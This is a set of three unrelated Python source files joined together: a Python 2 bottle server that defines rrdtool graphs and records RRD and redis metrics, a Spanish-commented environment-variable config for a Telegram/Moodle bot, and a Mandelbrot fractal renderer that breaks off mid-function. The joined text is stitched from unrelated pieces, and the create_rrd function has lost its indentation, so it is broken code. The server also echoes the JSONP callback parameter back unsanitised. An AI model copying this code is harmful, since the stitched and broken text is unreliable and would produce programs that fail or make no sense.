    RRD_GRAPH_TITLE['penelope-%s-cache-size' % index_type] = '%%(host)s | %s node cache size' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-cache-size' % index_type, 'Penelope %s node cache size' % index_type))
    # size of metadata caches
    RRD_GRAPH_DEFS['penelope-%s-metadata-cache-size' % index_type] = [
        'DEF:items=%%(rrdpath)s/penelope/%s_metadata_cache_size\:mean.rrd:sum:AVERAGE' % index_type,
        'AREA:items#9999FF:items\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-metadata-cache-size' % index_type] = '%%(host)s | %s metadata cache size' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-metadata-cache-size' % index_type, 'Penelope %s metadata cache size' % index_type))
    # eviction info
    RRD_GRAPH_DEFS['penelope-%s-cache-evictions' % index_type] = [
        'DEF:evictions=%%(rrdpath)s/penelope/%s_nodecache_evictions\:total.rrd:sum:AVERAGE' % index_type,
        'LINE:evictions#FF0066:evictions/min\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-cache-evictions' % index_type] = '%%(host)s | %s cache evictions' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-cache-evictions' % index_type, 'Penelope %s cache evictions' % index_type))
    # operation counters info
    RRD_GRAPH_DEFS['penelope-%s-index' % index_type] = [
        'DEF:index=%%(rrdpath)s/penelope/%s_index\:count.rrd:sum:AVERAGE' % index_type,
        'LINE:index#66FF00:index operations/min\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-index' % index_type] = '%%(host)s | %s index operations' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-index' % index_type, 'Penelope %s index operations' % index_type))
    # split info
    RRD_GRAPH_DEFS['penelope-%s-split' % index_type] = [
        'DEF:split=%%(rrdpath)s/penelope/%s_split\:count.rrd:sum:AVERAGE' % index_type,
        'LINE:split#66FF00:tree splits/min\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-split' % index_type] = '%%(host)s | %s splits' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-split' % index_type, 'Penelope %s splits' % index_type))
    # redirect info
    RRD_GRAPH_DEFS['penelope-%s-index-redirect' % index_type] = [
        'DEF:redirect=%%(rrdpath)s/penelope/%s_index_redirect\:count.rrd:sum:AVERAGE' % index_type,
        'LINE:redirect#00FF66:redirects/min\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-index-redirect' % index_type] = '%%(host)s | %s index redirects' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-index-redirect' % index_type, 'Penelope %s index redirects' % index_type))
    # metadata read rates
    RRD_GRAPH_DEFS['penelope-%s-metadata-reads' % index_type] = [
        'DEF:local=%%(rrdpath)s/penelope/%s_metadata_local_read\:count.rrd:sum:AVERAGE' % index_type,
        'DEF:remote=%%(rrdpath)s/penelope/%s_metadata_remote_read\:count.rrd:sum:AVERAGE' % index_type,
        'DEF:retry=%%(rrdpath)s/penelope/%s_metadata_retry\:count.rrd:sum:AVERAGE' % index_type,
        'AREA:local#66FF00:local reads/min\\l',
        'AREA:remote#6600FF:remote reads/min\\l:STACK',
        'AREA:retry#FF6666:retried remote reads/min\\l:STACK',
    ]
    RRD_GRAPH_TITLE['penelope-%s-metadata-reads' % index_type] = '%%(host)s | %s metadata reads' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-metadata-reads' % index_type, 'Penelope %s metadata reads' % index_type))
    # metadata read duration
    # NOTE(review): min DEFs are declared but not drawn — presumably kept
    # for future use; rrdtool tolerates unused DEFs.
    RRD_GRAPH_DEFS['penelope-%s-metadata-read-duration' % index_type] = [
        'DEF:local_min=%%(rrdpath)s/penelope/%s_metadata_local_read_duration\:min.rrd:sum:AVERAGE' % index_type,
        'DEF:local_mean=%%(rrdpath)s/penelope/%s_metadata_local_read_duration\:mean.rrd:sum:AVERAGE' % index_type,
        'DEF:local_max=%%(rrdpath)s/penelope/%s_metadata_local_read_duration\:max.rrd:sum:AVERAGE' % index_type,
        'DEF:remote_min=%%(rrdpath)s/penelope/%s_metadata_remote_read_duration\:min.rrd:sum:AVERAGE' % index_type,
        'DEF:remote_mean=%%(rrdpath)s/penelope/%s_metadata_remote_read_duration\:mean.rrd:sum:AVERAGE' % index_type,
        'DEF:remote_max=%%(rrdpath)s/penelope/%s_metadata_remote_read_duration\:max.rrd:sum:AVERAGE' % index_type,
        'LINE:local_mean#66FF00:local reads mean ms\\l',
        'LINE:local_max#FFFF00:local reads max ms\\l',
        'LINE:remote_mean#6600FF:remote reads mean ms\\l',
        'LINE:remote_max#FF00FF:remote reads max ms \\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-metadata-read-duration' % index_type] = '%%(host)s | %s metadata read duration' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-metadata-read-duration' % index_type, 'Penelope %s metadata read duration' % index_type))
    # metadata invalidation info
    RRD_GRAPH_DEFS['penelope-%s-metadata-invalidation' % index_type] = [
        'DEF:total=%%(rrdpath)s/penelope/%s_metadata_invalidation\:count.rrd:sum:AVERAGE' % index_type,
        'DEF:remote=%%(rrdpath)s/penelope/%s_metadata_invalidation_cmd_rx\:count.rrd:sum:AVERAGE' % index_type,
        'AREA:total#66FF00:invalidations total/min\\l',
        'AREA:remote#6600FF:invalidations from remote command/min\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-metadata-invalidation' % index_type] = '%%(host)s | %s metadata invalidation' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-metadata-invalidation' % index_type, 'Penelope %s metadata invalidation' % index_type))
    # information about the frequency and duration about maybeSplit decisions
    RRD_GRAPH_DEFS['penelope-%s-maybe-split' % index_type] = [
        'DEF:total=%%(rrdpath)s/penelope/%s_maybe_split\:count.rrd:sum:AVERAGE' % index_type,
        'DEF:expensive=%%(rrdpath)s/penelope/%s_maybe_split_expensive\:count.rrd:sum:AVERAGE' % index_type,
        'AREA:total#66FF00:maybeSplit total/min\\l',
        'AREA:expensive#6600FF:maybeSplit expensive/min\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-maybe-split' % index_type] = '%%(host)s | %s maybeSplit' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-maybe-split' % index_type, 'Penelope %s maybeSplit' % index_type))
    RRD_GRAPH_DEFS['penelope-%s-maybe-split-fetch-duration' % index_type] = [
        'DEF:min=%%(rrdpath)s/penelope/%s_maybe_split_fetch_duration\:min.rrd:sum:AVERAGE' % index_type,
        'DEF:mean=%%(rrdpath)s/penelope/%s_maybe_split_fetch_duration\:mean.rrd:sum:AVERAGE' % index_type,
        'DEF:max=%%(rrdpath)s/penelope/%s_maybe_split_fetch_duration\:max.rrd:sum:AVERAGE' % index_type,
        'LINE:mean#66FF00:maybeSplit fetch mean ms\\l',
        'LINE:max#FF0000:maybeSplit fetch max ms\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-maybe-split-fetch-duration' % index_type] = '%%(host)s | %s feature count fetch duration' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-maybe-split-fetch-duration' % index_type, 'Penelope %s feature count fetch duration' % index_type))
    # guava caches
    RRD_GRAPH_DEFS['penelope-%s-metadata-cache-rates' % index_type] = [
        'DEF:hitrate=%%(rrdpath)s/penelope/%s_metadatacache_hit_rate\:mean.rrd:sum:AVERAGE' % index_type,
        'DEF:missrate=%%(rrdpath)s/penelope/%s_metadatacache_miss_rate\:mean.rrd:sum:AVERAGE' % index_type,
        'AREA:hitrate#66FF00:hits\\l',
        'AREA:missrate#FF0000:misses\\l:STACK',
    ]
    RRD_GRAPH_TITLE['penelope-%s-metadata-cache-rates' % index_type] = '%%(host)s | %s metadata cache performance' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-metadata-cache-rates' % index_type, 'Penelope %s metadata cache performance' % index_type))
    RRD_GRAPH_DEFS['penelope-%s-metadata-cache-evictions' % index_type] = [
        'DEF:evictions=%%(rrdpath)s/penelope/%s_metadatacache_evictions\:mean.rrd:sum:AVERAGE' % index_type,
        'LINE:evictions#FF5555:evictions\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-metadata-cache-evictions' % index_type] = '%%(host)s | %s metadata cache evictions' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-metadata-cache-evictions' % index_type, 'Penelope %s metadata cache evictions' % index_type))
# database tombstone info
# NOTE(review): colsmax is DEF'd but not drawn; rrdtool tolerates unused DEFs.
RRD_GRAPH_DEFS['penelope-database-columns-fetched'] = [
    'DEF:colsmean=%(rrdpath)s/penelope/database_columns\:mean.rrd:sum:AVERAGE',
    'DEF:colsmax=%(rrdpath)s/penelope/database_columns\:max.rrd:sum:AVERAGE',
    'DEF:tombstonesmean=%(rrdpath)s/penelope/database_tombstones\:mean.rrd:sum:AVERAGE',
    'DEF:tombstonesmax=%(rrdpath)s/penelope/database_tombstones\:max.rrd:sum:AVERAGE',
    'AREA:colsmean#00FFAA:mean columns fetched\\l',
    'AREA:tombstonesmean#FF5555:mean tombstones fetched\\l',
    'LINE:tombstonesmax#FF0000:max tombstones fetched\\l',
]
RRD_GRAPH_TITLE['penelope-database-columns-fetched'] = '%(host)s | columns fetched'
RRD_GRAPH_TYPES.append(('penelope-database-columns-fetched', 'Penelope columns fetched'))
# metadata invalidation info
RRD_GRAPH_DEFS['penelope-metadata-remote-commands-serviced'] = [
    'DEF:total=%(rrdpath)s/penelope/metadata_remote_commands_serviced\:count.rrd:sum:AVERAGE',
    'AREA:total#6600FF:remote reads serviced/min\\l',
]
RRD_GRAPH_TITLE['penelope-metadata-remote-commands-serviced'] = '%(host)s | metadata remote reads serviced'
RRD_GRAPH_TYPES.append(('penelope-metadata-remote-commands-serviced', 'Penelope metadata remote reads serviced'))
# cassandra connection stats
RRD_GRAPH_DEFS['cassandra-connections-open'] = [
    'DEF:conns=%(rrdpath)s/cassandra_connection/connections.open.rrd:sum:AVERAGE',
    'AREA:conns#0066FF:connections open\\l',
]
RRD_GRAPH_TITLE['cassandra-connections-open'] = '%(host)s | open cassandra connections'
RRD_GRAPH_TYPES.append(('cassandra-connections-open', 'Cassandra open connections'))
# Discover rabbitmq queue names from the RRD files on disk and build one
# size graph and one rates graph per queue.
queues_list = {}
path = RRDPATH % {
    'host': '*',
    'service': 'rabbitmq',
    'metric': '*',
}
for filename in glob(path):
    filename = os.path.basename(filename)
    k = filename.rsplit('.', 1)[0]
    # The _unack/_rate files are companions of a base queue metric, not
    # queues of their own.
    if k.endswith('_unack') or k.endswith('_rate'):
        continue
    queues_list[k] = None
# dict used only for de-duplication; .keys() is a list in Python 2
queues_list = queues_list.keys()
for queue in queues_list:
    RRD_GRAPH_DEFS['rabbitmq-%s' % queue] = [
        'DEF:size=%%(rrdpath)s/rabbitmq/%s.rrd:sum:AVERAGE' % queue,
        'DEF:unack=%%(rrdpath)s/rabbitmq/%s_unack.rrd:sum:AVERAGE' % queue,
        'LINE:size#FF6600:%s queue size\\l' % queue,
        'LINE:unack#FF0000:%s unacknowledged\\l' % queue,
    ]
    RRD_GRAPH_TITLE['rabbitmq-%s' % queue] = '%%(host)s | %s queue size' % queue
    RRD_GRAPH_TYPES.append(('rabbitmq-%s' % queue, queue))
    rabbitmq_rate_graph = 'rabbitmq-rates-%s' % queue
    RRD_GRAPH_DEFS[rabbitmq_rate_graph] = [
        'DEF:deliver=%%(rrdpath)s/rabbitmq/%s_deliver_rate.rrd:sum:AVERAGE' % queue,
        'DEF:ack=%%(rrdpath)s/rabbitmq/%s_ack_rate.rrd:sum:AVERAGE' % queue,
        'DEF:publish=%%(rrdpath)s/rabbitmq/%s_publish_rate.rrd:sum:AVERAGE' % queue,
        'LINE2:deliver#fcff00:%s delivered/s\\l:dashes=5,10' % queue,
        'LINE:ack#4EFF4D:%s acknowledged/s\\l' % queue,
        'LINE:publish#FF3484:%s published/s\\l:dashes=10,5' % queue,
    ]
    RRD_GRAPH_TITLE[rabbitmq_rate_graph] = '%%(host)s | %s queue rates' % queue
    RRD_GRAPH_TYPES.append((rabbitmq_rate_graph, '%s rates' % queue))
# Discover EBS mount prefixes from the RRD files on disk and build per-mount
# iops and queue-depth graphs.
path = RRDPATH % {
    'host': '*',
    'service': 'ebs',
    'metric': '*',
}
ebs_mounts = {}
for filename in glob(path):
    filename = os.path.basename(filename)
    # Metric files are named "<mount>_<metric>.rrd"
    k = filename.split('_', 1)[0]
    if not k in ebs_mounts:
        ebs_mounts[k] = True
# dict used only for de-duplication; .keys() is a list in Python 2
ebs_mounts = ebs_mounts.keys()
for mount in ebs_mounts:
    RRD_GRAPH_DEFS['ebs-%s-ops' % mount] = [
        'DEF:reads=%%(rrdpath)s/ebs/%s_read_ops.rrd:sum:AVERAGE' % mount,
        'DEF:writes=%%(rrdpath)s/ebs/%s_write_ops.rrd:sum:AVERAGE' % mount,
        'LINE:reads#FF6600:max reads/sec\\l',
        'LINE:writes#00FF66:max writes/sec\\l',
    ]
    RRD_GRAPH_DEFS['ebs-%s-queue' % mount] = [
        'DEF:queue=%%(rrdpath)s/ebs/%s_queue_length.rrd:sum:AVERAGE' % mount,
        'LINE:queue#66FFFF:Queued operations\\l',
    ]
    RRD_GRAPH_TITLE['ebs-%s-ops' % mount] = '%%(host)s | %s ebs iops' % mount
    RRD_GRAPH_TITLE['ebs-%s-queue' % mount] = '%%(host)s | %s ebs queue' % mount
    RRD_GRAPH_TYPES.append(('ebs-%s-ops' % mount, '%s ebs iops' % mount))
    RRD_GRAPH_TYPES.append(('ebs-%s-queue' % mount, '%s ebs queue' % mount))
# Discover monit-tracked services from the RRD files on disk and build
# per-service CPU and memory graphs.
path = RRDPATH % {
    'host': '*',
    'service': 'monit',
    'metric': '*',
}
services = {}
for filename in glob(path):
    filename = os.path.basename(filename)
    # Metric files are named "<service>_<metric>.rrd"
    monitservice = filename.split('_', 1)[0]
    services[monitservice] = None
for monitservice in services.keys():
    RRD_GRAPH_DEFS['monit-%s-cpu' % monitservice] = [
        'DEF:cpu=%%(rrdpath)s/monit/%s_cpu.rrd:sum:AVERAGE' % monitservice,
        #'CDEF:cpu_pct=cpu,100,*',
        'LINE:cpu#FF00FF:%s CPU\\l' % monitservice,
    ]
    RRD_GRAPH_DEFS['monit-%s-memory' % monitservice] = [
        'DEF:memory=%%(rrdpath)s/monit/%s_memory.rrd:sum:AVERAGE' % monitservice,
        # Stored values are KB; scale to bytes for display
        'CDEF:memory_bytes=memory,1024,*',
        'LINE:memory_bytes#00FF00:%s memory\\l' % monitservice,
    ]
    RRD_GRAPH_TITLE['monit-%s-cpu' % monitservice] = '%%(host)s | %s CPU' % monitservice
    RRD_GRAPH_TITLE['monit-%s-memory' % monitservice] = '%%(host)s | %s memory' % monitservice
    RRD_GRAPH_TYPES.append(('monit-%s-cpu' % monitservice, '%s CPU' % monitservice))
    RRD_GRAPH_TYPES.append(('monit-%s-memory' % monitservice, '%s Memory' % monitservice))
    # CPU is a percentage; pin the y-axis to 0-100
    RRD_GRAPH_OPTIONS['monit-%s-cpu' % monitservice] = ['--upper-limit', '100.0']
#path = RRDPATH % {
# 'host': '*',
# 'service': 'haproxy',
# 'metric': '*',
#}
#hosts = []
#for filename in glob(path):
# hostname = filename.split('/')[-1].split('_', 1)[0]
# if not hostname in hosts:
# hosts.append(hostname)
#
#RRD_GRAPH_DEFS['haproxy-sessions'] = []
#for host in hosts:
# RRD_GRAPH_DEFS['haproxy-sessions'] += [
# 'DEF:%s_total=%%(rrdpath)s/haproxy/%s_stot.rrd' % (host, host),
# 'LINE:%s_total#66FFFF:%s total sessions\\l' % (host, host),
# ]
#RRD_GRAPH_TITLE['haproxy-sessions'] = '%%(host)s | haproxy sessions'
#RRD_GRAPH_TYPES.append(('haproxy-sessions', 'Sessions'))
# Per-disk iops / throughput / space graphs for the fixed set of local disks.
for disk in ('raid0', 'sda1'):
    RRD_GRAPH_DEFS['disk-%s-iops' % disk] = [
        'DEF:reads=%%(rrdpath)s/disk/%s.reads.rrd:sum:AVERAGE' % disk,
        'DEF:writes=%%(rrdpath)s/disk/%s.writes.rrd:sum:AVERAGE' % disk,
        'LINE:reads#33CCCC:reads/s\\l',
        'LINE:writes#CC3300:writes/s\\l',
    ]
    RRD_GRAPH_DEFS['disk-%s-bytes' % disk] = [
        'DEF:read=%%(rrdpath)s/disk/%s.bytes_read.rrd:sum:AVERAGE' % disk,
        'DEF:written=%%(rrdpath)s/disk/%s.bytes_written.rrd:sum:AVERAGE' % disk,
        'LINE:read#55FFFF:bytes read\\l',
        'LINE:written#FF5500:bytes written\\l',
    ]
    RRD_GRAPH_DEFS['disk-%s-space' % disk] = [
        'DEF:used=%%(rrdpath)s/disk/%s.used_space.rrd:sum:AVERAGE' % disk,
        # BUG FIX: this DEF was also named "used", clobbering the previous
        # one and leaving the LINE:free directive below referencing an
        # undefined rrdtool variable (the graph would fail to render).
        'DEF:free=%%(rrdpath)s/disk/%s.free_space.rrd:sum:AVERAGE' % disk,
        'LINE:used#660099:GBs used\\l',
        'LINE:free#4499ff:GBs free\\l',
    ]
    RRD_GRAPH_TITLE['disk-%s-iops' % disk] = '%%(host)s | %s iops' % disk
    RRD_GRAPH_TITLE['disk-%s-bytes' % disk] = '%%(host)s | %s bytes/sec' % disk
    RRD_GRAPH_TITLE['disk-%s-space' % disk] = '%%(host)s | %s GBs' % disk
    RRD_GRAPH_TYPES.append(('disk-%s-iops' % disk, '%s iops' % disk))
    RRD_GRAPH_TYPES.append(('disk-%s-bytes' % disk, '%s bytes' % disk))
    RRD_GRAPH_TYPES.append(('disk-%s-space' % disk, '%s GBs' % disk))
def get_clusto_name(instanceid):
    """Resolve an instance id to its clusto hostname, with a 5 minute cache.

    On any lookup failure the raw instance id is returned instead (and
    cached, so a broken lookup is not retried on every request).
    """
    key = 'clusto/hostname/%s' % instanceid
    c = cache.get(key)
    if c:
        return c
    try:
        server = clusto.get(instanceid)
        hostname = server[0].attr_value(key='system', subkey='hostname')
        cache.set(key, hostname, 300)
        return hostname
    except Exception:
        # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit are
        # no longer swallowed; any clusto/lookup failure still falls back.
        cache.set(key, instanceid, 300)
        return instanceid
def dumps(obj):
    """Serialize *obj* to JSON, honoring an optional JSONP ?callback=
    query parameter; sets the bottle response content type accordingly."""
    body = json.dumps(obj, indent=2)
    jsonp = bottle.request.params.get('callback', None)
    if not jsonp:
        bottle.response.content_type = 'application/json'
        return body
    bottle.response.content_type = 'text/javascript'
    return '%s(%s)' % (jsonp, body)
def rrdtool(args):
    """Run the rrdtool CLI with *args* (a space-separated argument string)
    and block until it exits."""
    argv = ['rrdtool'] + args.split(' ')
    subprocess.Popen(argv).wait()
def create_rrd(filename, metric, data):
print 'Creating rrd', filename, metric, data
try:
os.makedirs(os.path.dirname(filename))
except:
pass
rrdtool_args = {
'filename': filename,
'start': (data['ts'] - 61),
'dstype': data['type'],
}
if data['type'] == 'DERIVE':
rrdtool_args['min'] = '0'
else:
rrdtool_args['min'] = 'U'
rrdtool('create %(filename)s --start %(start)s --step 60 \
DS:sum:%(dstype)s:600:%(min)s:U \
RRA:AVERAGE:0.5:1:1500 \
RRA:AVERAGE:0.5:5:2304 \
RRA:AVERAGE:0.5:30:4320' % rrdtool_args)
def update_rrd(filename, metric, data):
    """Append one (timestamp, value) sample to an existing RRD file."""
    sample = '%s:%s' % (str(data['ts']), str(data['value']))
    rrdtool('update %s %s' % (filename, sample))
def update_redis(host, service, metricname, metric):
    """Record the latest (ts, value) sample for host/service/metric in redis."""
    payload = json.dumps((metric['ts'], metric['value']))
    db.sadd('hosts', host)
    db.hset('metrics/%s' % host, '%s/%s' % (service, metricname), payload)
def process_rrd_update(host, service, body):
    """Decode a JSON metrics payload and write each metric to its RRD file
    and to redis, creating the RRD on first sight.

    body: JSON object mapping metric name -> sample dict ('ts', 'value', ...)
    """
    metrics = json.loads(body)
    for metric in metrics:
        rrdfile = RRDPATH % {
            'host': host,
            'service': service,
            'metric': metric,
        }
        rrdfullpath = '/var/lib/metartg/rrds/' + rrdfile
        if not os.path.exists(rrdfullpath):
            create_rrd(rrdfullpath, metric, metrics[metric])
        # NOTE(review): the update uses the *relative* path while creation
        # uses the absolute one -- presumably the process runs with
        # /var/lib/metartg/rrds as its working directory (see the
        # commented-out rrdcached variant in update_rrd); confirm.
        update_rrd(rrdfile, metric, metrics[metric])
        update_redis(host, service, metric, metrics[metric])
    return
def rrdupdate_worker(queue):
    """Worker loop: pull (host, service, body) tuples off *queue* forever
    and apply them; falsy items are ignored."""
    while True:
        item = queue.get()
        if not item:
            continue
        process_rrd_update(*item)
#procs = []
#for i in range(2):
# procs.append(eventlet.spawn_n(rrdupdate_worker, rrdqueue))
#procs = []
#for i in range(4):
# proc = multiprocessing.Process(target=rrdupdate_worker, args=(update_queue,))
# proc.start()
# procs.append(proc)
@bottle.get('/status')
def status():
    """Report the depth of the pending RRD update queue as JSON."""
    stats = {'rrdqueue': rrdqueue.qsize()}
    return dumps(stats)
@bottle.post('/rrd/:host/:service')
def post_rrd_update(host, service):
    """Accept a metrics payload and queue it for asynchronous processing.

    Responds 202 immediately; the worker does the actual RRD writes.
    """
    payload = bottle.request.body.read()
    rrdqueue.put((host, service, payload))
    bottle.response.status = 202
    return
def cassandra_scores_graphdef(host):
    """Build rrdtool DEF/LINE directives, one pair per peer, for every
    cassandra_scores RRD found under *host*, cycling a fixed palette."""
    palette = ['FF6600', 'CC3333', '00FF00', 'FFCC00', 'DA4725', '66CC66',
               '6EA100', '0000FF', 'EACC00', 'D8ACE0', '4668E4', '35962B',
               '8D00BA']
    directives = []
    for idx, filename in enumerate(sorted(glob('%s/cassandra_scores/*.rrd' % host))):
        peer = filename.rsplit('/', 1)[1]
        # Drop the .rrd suffix and make the peer name rrdtool-safe
        name = peer.rsplit('.', 1)[0].replace('.', '-')
        colour = palette[idx % len(palette)]
        directives.append('DEF:%s=%s:sum:AVERAGE' % (name, filename))
        directives.append('LINE:%s#%s:%s score\\l' % (name, colour, name))
    return directives
@bottle.get('/graph/:host/:graphtype')
def get_rrd_graph(host, graphtype):
    """Render a PNG graph for (host, graphtype) by shelling out to rrdtool.

    Query parameters:
        start, end -- unix timestamps (default: the last hour)
        size       -- 'small' (375x100) or anything else for 600x200

    Returns the raw PNG bytes with an image/png content type.
    """
    now = int(time())
    params = bottle.request.params
    start = params.get('start', (now - 3600))
    end = params.get('end', now)
    size = params.get('size', 'large')
    # Fixed dark color scheme; data is read through the rrdcached daemon
    cmd = ['/usr/bin/rrdtool', 'graph',
        '-',
        '--daemon', '127.0.0.1:42217',
        '--font', 'DEFAULT:7:monospace',
        '--font-render-mode', 'normal',
        '--color', 'MGRID#880000',
        '--color', 'GRID#777777',
        '--color', 'CANVAS#000000',
        '--color', 'FONT#ffffff',
        '--color', 'BACK#444444',
        '--color', 'SHADEA#000000',
        '--color', 'SHADEB#000000',
        '--color', 'FRAME#444444',
        '--color', 'ARROW#FFFFFF',
        '--imgformat', 'PNG',
        '--tabwidth', '75',
        '--start', str(start),
        '--end', str(end),
    ]
    cmd += RRD_GRAPH_OPTIONS.get(graphtype, [])
    # Title template may contain %(host)s, filled with the clusto hostname
    cmd += ['--title', RRD_GRAPH_TITLE.get(graphtype, host) % {
        'host': get_clusto_name(host),
    }]
    if size == 'small':
        cmd += [
            #'--no-legend',
            '--width', '375',
            '--height', '100'
        ]
    else:
        cmd += [
            '--width', '600',
            '--height', '200',
            '--watermark', 'simplegeo'
        ]
    # cassandra-scores graphs are built dynamically from the host's RRD files
    if graphtype == 'cassandra-scores':
        if size == 'small':
            cmd.append('--no-legend')
        cmd += cassandra_scores_graphdef(host)
    # Large graphs may have a dedicated definition set (RRD_LGRAPH_DEFS)
    if size == 'large':
        if graphtype in RRD_LGRAPH_DEFS:
            DEFS = RRD_LGRAPH_DEFS.get(graphtype, [])
        else:
            DEFS = RRD_GRAPH_DEFS.get(graphtype, [])
    else:
        DEFS = RRD_GRAPH_DEFS.get(graphtype, [])
    # Substitute the per-host rrd path into each DEF/LINE template
    for gdef in DEFS:
        cmd.append(gdef % {
            'rrdpath': '%s' % host,
        })
    #print '\n'.join(cmd)
    # TZ pinned so x-axis labels are consistent regardless of server timezone
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, env={'TZ': 'PST8PDT'})
    stdout, stderr = proc.communicate()
    bottle.response.content_type = 'image/png'
    return stdout
@bottle.get('/search')
def search():
    """Return servers that are members of ALL clusto pools named in ?q=.

    Pool names may be separated by spaces, '+' or ','. Results are cached
    for 5 minutes keyed on the sorted pool list.
    """
    p = bottle.request.params
    query = p.get('q', None)
    if not query:
        bottle.abort(400, 'Parameter "q" is required')
    pools = query.replace('+', ' ').replace(',', ' ').split(' ')
    pools.sort()
    cachekey = 'search/%s' % ','.join(pools)
    result = cache.get(cachekey)
    if result:
        return dumps(json.loads(result))
    def get_contents(name):
        # Resolve one pool name to the set of entities it contains
        obj = clusto.get_by_name(name)
        return set(obj.contents())
    pools = list(gpool.imap(get_contents, pools))
    first = pools[0]
    pools = pools[1:]
    # NOTE(review): the next two assignments look dead -- both `result` and
    # this `servers` are overwritten below before use; presumably leftovers
    # from an earlier version. Confirm gpool.imap is lazy for this pool
    # implementation before removing.
    result = []
    servers = gpool.imap(lambda x: (x, x.attrs()), first.intersection(*pools))
    def get_server_info(server):
        # Shape one server entity into a JSON-friendly dict
        return {
            'name': server.name,
            'parents': [x.name for x in server.parents()],
            'contents': [x.name for x in server.contents()],
            'ip': server.attr_values(key='ip', subkey='ipstring'),
            'dnsname': server.attr_values(key='ec2', subkey='public-dns'),
        }
    servers = list(gpool.imap(get_server_info, first.intersection(*pools)))
    servers.sort(key=lambda x: x['name'])
    cache.set(cachekey, json.dumps(servers), 300)
    return dumps(servers)
@bottle.get('/static/:filename')
def serve_static(filename):
    """Serve a file from the static assets directory."""
    return bottle.static_file(filename, root=STATIC_PATH)
@bottle.get('/')
def index():
    """Render the landing page: graph types grouped by their name prefix.

    RRD_GRAPH_TYPES names have the form 'group-metric'; everything before
    the first '-' becomes the group, the remainder the metric key.
    """
    template = env.get_template('metrics.html')
    groups = {}
    for name, human_name in RRD_GRAPH_TYPES:
        group, metric = name.split('-', 1)
        if not group in groups:
            groups[group] = {}
        groups[group][metric] = human_name
    result = []
    for group in groups:
        graphs = groups[group]
        # Python 2 idiom: items() returns a sortable list (the py2-style
        # print statements elsewhere in this file confirm the version)
        graphs = graphs.items()
        graphs.sort()
        result.append((group, graphs))
    result.sort()
    return template.render(groups=result)
# Run the bottle development server when executed directly.
if __name__ == '__main__':
    bottle.run()
|
from os import getenv


def _env_required(name, error_message):
    """Return the value of environment variable *name*, raising
    Exception(error_message) when it is unset.

    BUG FIX: the original code converted with int() (or bound the raw value)
    *before* checking ``is None``, so for the int-typed settings a missing
    variable raised a bare TypeError from ``int(None)`` and the helpful
    message below was unreachable.
    """
    value = getenv(name)
    if value is None:
        raise Exception(error_message)
    return value


# TELEGRAM
OWNER = int(_env_required('OWNER', "Por favor configura tu Telegram User ID"))
API_ID = int(_env_required('API_ID', "Por favor configura el API_ID del Bot"))
API_HASH = _env_required('API_HASH', "Por favor configura el API_HASH del Bot")
TELEGRAM_TOKEN = _env_required('TELEGRAM_TOKEN', "Por favor configura el TOKEN del Bot")
# DATOS DEL MOODLE
HOST = _env_required('HOST', "Por favor configura la URL del Moodle")
ACCOUNT = _env_required('ACCOUNT', "Por favor configura tu nombre de usuario del Moodle")
PASSWORD = _env_required('PASSWORD', "Por favor configura tu contraseña del Moodle")
# CUENTA DE MEGA
PASS_MEGA = _env_required('PASS_MEGA', "Por favor configura tu contraseña de GMAIL")
GMAIL_MEGA = _env_required('GMAIL_MEGA', "Por favor configura tu correo de GMAIL")
# ARCHIVOS
MEGABYTES = int(_env_required('MEGABYTES', "Por favor configura los MEGABYTES a los que se dividirán los archivos"))
import cv2
import numpy as np
from numpy import complex, array
import colorsys
ITERATIONS = 1000  # escape-time iteration cap passed to mandelbrot()
SIZE = 700 # Image size (width == height, in pixels)
# Convert from number of iterations to RGB
# (only the blue channel varies with i; red/green are fixed at 0.4)
def getColour(i):
    return (0.4, 0.4, i * 10 / 255.0)
# function defining a mandelbrot
def mandelbrot(x, y, iterations = ITERATIONS):
    """Return the colour for the point (x, y): the escape colour when |z|
    exceeds 2 within *iterations* steps, otherwise the in-set colour."""
    point = complex(x, y)
    z = 0
    for step in range(1, iterations):
        if abs(z) > 2:
            return getColour(step)
        z = z * z + point
    return (0.4, 0.4, ITERATIONS / 255.0)
# creating the new image in RGB mode
def mandelSet(frameCount):
    """Render a SIZE x SIZE x 3 float array of the Mandelbrot set.

    x maps to roughly [-1.5, 0.5] and y to [-1, 1] (offsets 0.75*SIZE and
    0.5*SIZE, scale SIZE/2).
    NOTE(review): frameCount is forwarded to mandelbrot() as its *iterations*
    cap, so later frames are rendered with more iterations -- confirm this
    is the intended animation effect.
    """
    pixels = np.zeros((SIZE,SIZE,3))
    for x in range(SIZE):
        # displaying the progress as percentage
        # print("%.2f %%" % (x / SIZE * 100.0))
        for y in range(SIZE):
            pixels[y, x] = mandelbrot((x - (0.75 * SIZE)) / (SIZE / 2),
                            (y - (0.5 * SIZE)) / (SIZE / 2), frameCount)
    return pixels
# to display the created fractal after
# completing the given number of iterations
def getFrame():
    """Return the current frame, using function attributes
    (getFrame.count / getFrame.z) as static state between calls."""
    print('Frame: ' + str(getFrame.count))
    # Create data on first call only
    # NOTE(review): despite the comment above, this condition holds for the
    # first SIZE*SIZE calls, so the (slow) render is redone on every frame
    # until count reaches 490000 -- confirm whether `getFrame.z is None`
    # was actually meant, or whether per-frame re-rendering is intentional.
    if getFrame.count/(SIZE*SIZE) < 1:
        getFrame.z = mandelSet(getFrame.count)
